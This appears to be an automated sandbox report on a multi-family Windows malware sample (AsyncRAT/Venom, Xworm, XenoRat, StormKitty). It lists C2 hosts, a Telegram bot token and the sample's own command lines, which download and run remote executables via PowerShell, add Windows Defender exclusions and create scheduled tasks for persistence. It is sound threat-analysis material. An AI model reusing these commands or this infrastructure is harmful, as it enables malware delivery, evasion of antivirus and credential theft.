asyncrat | 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
17-04-2024 11:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0685487fa7e474e68a40a1b1ff49b60.exe
Size

167KB
MD5

d0685487fa7e474e68a40a1b1ff49b60
SHA1

069285708e07814d852bbd5f39a7ffbb3c9e2d94
SHA256

87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
SHA512

eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8
SSDEEP

1536:216oQ/DtPFVzE95jNNKCw5VY9bG1wWQkAw6JOXHWIOGoWIFjo7xLFVGy9w04xJXX:ouxFG9Rw3Y9bGVAfOXWxrjCT4

Score

10^/10

asyncrat stormkitty xenorat xworm default persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

xworm

dentiste.ddns.net:7000

86.68.222.14:7000

51.254.53.24:7000

dentiste.ddns.net:7010

Attributes

Install_directory
%AppData%
install_file
Mise à jour carte CPS.exe
telegram
https://api.telegram.org/bot5720516014:AAF4KOAv3GXHFU0RS3g4HPsucKDwQf01__A

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

Mutex

hoyqzolrquxmbnzaee

Attributes

delay
1
install
true
install_file
system.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/ckrnc4Uk

aes.plain

Extracted

Family

xenorat

dentiste.ddns.net

Mutex

Xeno_syteme_update

Attributes

delay
5000
install_path
appdata
port
7011
startup_name
System

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/2420-71-0x000000001E820000-0x000000001E82E000-memory.dmp	disable_win_def

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/memory/2420-0-0x0000000000060000-0x0000000000090000-memory.dmp	family_xworm
behavioral2/files/0x000b000000023429-75.dat	family_xworm
behavioral2/memory/4576-89-0x0000000000D10000-0x0000000000D2A000-memory.dmp	family_xworm
behavioral2/files/0x000e000000023391-363.dat	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/2420-107-0x000000001E520000-0x000000001E640000-memory.dmp	family_stormkitty

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000700000002342d-96.dat	family_asyncrat

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	d0685487fa7e474e68a40a1b1ff49b60.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	ssxnqp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	hycvpe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	xfjdwl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	system.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk	d0685487fa7e474e68a40a1b1ff49b60.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk	d0685487fa7e474e68a40a1b1ff49b60.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xfjdwl.lnk	xfjdwl.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xfjdwl.lnk	xfjdwl.exe

Executes dropped EXE 9 IoCs

pid	Process
4576	xfjdwl.exe
2980	hycvpe.exe
1488	ssxnqp.exe
4412	hycvpe.exe
2876	system.exe
3380	Mise à jour carte CPS.exe
4924	xfjdwl.exe
5000	Mise à jour carte CPS.exe
4464	xfjdwl.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe"	d0685487fa7e474e68a40a1b1ff49b60.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xfjdwl = "C:\\Users\\Admin\\AppData\\Roaming\\xfjdwl.exe"	xfjdwl.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
61	pastebin.com
62	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4332	schtasks.exe
2332	schtasks.exe
60	schtasks.exe
3192	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3384	timeout.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2420	d0685487fa7e474e68a40a1b1ff49b60.exe
4576	xfjdwl.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
516	powershell.exe
516	powershell.exe
3308	powershell.exe
3308	powershell.exe
4928	powershell.exe
4928	powershell.exe
5088	powershell.exe
5088	powershell.exe
2420	d0685487fa7e474e68a40a1b1ff49b60.exe
4840	powershell.exe
4840	powershell.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
4840	powershell.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
1488	ssxnqp.exe
4132	powershell.exe
4132	powershell.exe
4132	powershell.exe
2796	powershell.exe
2796	powershell.exe
2796	powershell.exe
4320	powershell.exe
4320	powershell.exe
4320	powershell.exe
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe
4224	powershell.exe
4224	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	d0685487fa7e474e68a40a1b1ff49b60.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	2420	d0685487fa7e474e68a40a1b1ff49b60.exe
Token: SeDebugPrivilege	4576	xfjdwl.exe
Token: SeDebugPrivilege	1488	ssxnqp.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	1488	ssxnqp.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	4320	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2876	system.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	2876	system.exe
Token: SeDebugPrivilege	4576	xfjdwl.exe
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	4412	hycvpe.exe
Token: SeDebugPrivilege	3380	Mise à jour carte CPS.exe
Token: SeDebugPrivilege	4924	xfjdwl.exe
Token: SeDebugPrivilege	5000	Mise à jour carte CPS.exe
Token: SeDebugPrivilege	4464	xfjdwl.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2420	d0685487fa7e474e68a40a1b1ff49b60.exe
4576	xfjdwl.exe
2876	system.exe
4412	hycvpe.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 516	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	92
PID 2420 wrote to memory of 516	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	92
PID 2420 wrote to memory of 3308	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	94
PID 2420 wrote to memory of 3308	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	94
PID 2420 wrote to memory of 4928	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	96
PID 2420 wrote to memory of 4928	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	96
PID 2420 wrote to memory of 5088	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	98
PID 2420 wrote to memory of 5088	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	98
PID 2420 wrote to memory of 2332	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	100
PID 2420 wrote to memory of 2332	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	100
PID 2420 wrote to memory of 4576	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	103
PID 2420 wrote to memory of 4576	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	103
PID 2420 wrote to memory of 2980	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	104
PID 2420 wrote to memory of 2980	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	104
PID 2420 wrote to memory of 2980	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	104
PID 2420 wrote to memory of 1488	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	105
PID 2420 wrote to memory of 1488	2420	d0685487fa7e474e68a40a1b1ff49b60.exe	105
PID 1488 wrote to memory of 1912	1488	ssxnqp.exe	106
PID 1488 wrote to memory of 1912	1488	ssxnqp.exe	106
PID 2980 wrote to memory of 4412	2980	hycvpe.exe	108
PID 2980 wrote to memory of 4412	2980	hycvpe.exe	108
PID 2980 wrote to memory of 4412	2980	hycvpe.exe	108
PID 1912 wrote to memory of 4840	1912	cmd.exe	132
PID 1912 wrote to memory of 4840	1912	cmd.exe	132
PID 4576 wrote to memory of 4132	4576	xfjdwl.exe	110
PID 4576 wrote to memory of 4132	4576	xfjdwl.exe	110
PID 1488 wrote to memory of 1316	1488	ssxnqp.exe	112
PID 1488 wrote to memory of 1316	1488	ssxnqp.exe	112
PID 1488 wrote to memory of 2332	1488	ssxnqp.exe	113
PID 1488 wrote to memory of 2332	1488	ssxnqp.exe	113
PID 1316 wrote to memory of 60	1316	cmd.exe	116
PID 1316 wrote to memory of 60	1316	cmd.exe	116
PID 2332 wrote to memory of 3384	2332	cmd.exe	117
PID 2332 wrote to memory of 3384	2332	cmd.exe	117
PID 1912 wrote to memory of 2796	1912	cmd.exe	118
PID 1912 wrote to memory of 2796	1912	cmd.exe	118
PID 4576 wrote to memory of 4320	4576	xfjdwl.exe	119
PID 4576 wrote to memory of 4320	4576	xfjdwl.exe	119
PID 1912 wrote to memory of 2760	1912	cmd.exe	122
PID 1912 wrote to memory of 2760	1912	cmd.exe	122
PID 4576 wrote to memory of 4224	4576	xfjdwl.exe	123
PID 4576 wrote to memory of 4224	4576	xfjdwl.exe	123
PID 1912 wrote to memory of 2276	1912	cmd.exe	125
PID 1912 wrote to memory of 2276	1912	cmd.exe	125
PID 4576 wrote to memory of 3192	4576	xfjdwl.exe	126
PID 4576 wrote to memory of 3192	4576	xfjdwl.exe	126
PID 4412 wrote to memory of 4332	4412	hycvpe.exe	128
PID 4412 wrote to memory of 4332	4412	hycvpe.exe	128
PID 4412 wrote to memory of 4332	4412	hycvpe.exe	128
PID 2332 wrote to memory of 2876	2332	cmd.exe	130
PID 2332 wrote to memory of 2876	2332	cmd.exe	130
PID 2876 wrote to memory of 4912	2876	system.exe	131
PID 2876 wrote to memory of 4912	2876	system.exe	131
PID 4912 wrote to memory of 3988	4912	cmd.exe	133
PID 4912 wrote to memory of 3988	4912	cmd.exe	133
PID 4912 wrote to memory of 4544	4912	cmd.exe	134
PID 4912 wrote to memory of 4544	4912	cmd.exe	134
PID 4912 wrote to memory of 1488	4912	cmd.exe	135
PID 4912 wrote to memory of 1488	4912	cmd.exe	135
PID 4912 wrote to memory of 3924	4912	cmd.exe	136
PID 4912 wrote to memory of 3924	4912	cmd.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe
"C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\d0685487fa7e474e68a40a1b1ff49b60.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'd0685487fa7e474e68a40a1b1ff49b60.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
  2⤵
  - Creates scheduled task(s)
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\xfjdwl.exe
  "C:\Users\Admin\AppData\Local\Temp\xfjdwl.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xfjdwl.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'xfjdwl.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\xfjdwl.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4224
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xfjdwl" /tr "C:\Users\Admin\AppData\Roaming\xfjdwl.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3192
- C:\Users\Admin\AppData\Local\Temp\hycvpe.exe
  "C:\Users\Admin\AppData\Local\Temp\hycvpe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Users\Admin\AppData\Roaming\XenoManager\hycvpe.exe
    "C:\Users\Admin\AppData\Roaming\XenoManager\hycvpe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "System" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD8CC.tmp" /F
      4⤵
      Creates scheduled task(s)
      PID:4332
- C:\Users\Admin\AppData\Local\Temp\ssxnqp.exe
  "C:\Users\Admin\AppData\Local\Temp\ssxnqp.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2276
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
      4⤵
      Creates scheduled task(s)
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9E7.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3384
  - - C:\Users\Admin\AppData\Roaming\system.exe
      "C:\Users\Admin\AppData\Roaming\system.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2876
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4912
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4840
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1488
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3924

C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Users\Admin\AppData\Roaming\xfjdwl.exe
C:\Users\Admin\AppData\Roaming\xfjdwl.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Users\Admin\AppData\Roaming\xfjdwl.exe
C:\Users\Admin\AppData\Roaming\xfjdwl.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mise à jour carte CPS.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hycvpe.exe.log

Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
af61dcf914d57e7998dfe04d3ed238cb

SHA1
429f22ebb40d3ff40b8e4b8efd0c94e9a37e6e22

SHA256
e635343dd85fef83832c727509de1e949d80b711a1deba38b1484aaf57304b84

SHA512
71bfc18f015863392782358c3fc3b9bd9a83cda5cf00a09fff114474475639fbad40a8b1ded3967ba2cd362da2ec34c9021b2859055700136c6ef1ffc082f0e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1d21c5fef72b3e753f02e95c05c55e62

SHA1
cb1ec770b0497b39f0c11f258f34a9a8140c3c48

SHA256
07642a92284cdc9354c06ccd1aa674d741a3b78ab19e2e447e5d49e997c51593

SHA512
b9c5d4b17c4b1f97ac383666ee620b3bf938a0dd2c5ff9a75b58b6624d6ccdc58a39e7e1e61561cf26aefc6f346f31eba3582e0ac94f906efeb7aa446c6eab72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a2c8179aaa149c0b9791b73ce44c04d1

SHA1
703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

SHA256
c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

SHA512
2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2524e72b0573fa94e9cb8089728a4b47

SHA1
3d5c4dfd6e7632153e687ee866f8ecc70730a0f1

SHA256
fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747

SHA512
99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f1524278ea37abbc504468eafbab2f17

SHA1
275e6a84fc3330f8b94e78846e4c125a941d0038

SHA256
1a54b9f42cb79055aa943f983de9b9865ff2e5a1496d170d9a0deb5a1cf95964

SHA512
df43639416c8c1c31c3ef4b16f8ed5f17a0e8d2a110e525801e96c8855f1dc2d98c042fa01507a1c6f9bed24b4eb4f0de39e248dee5dfbade350b0483af35bda

Download Submit
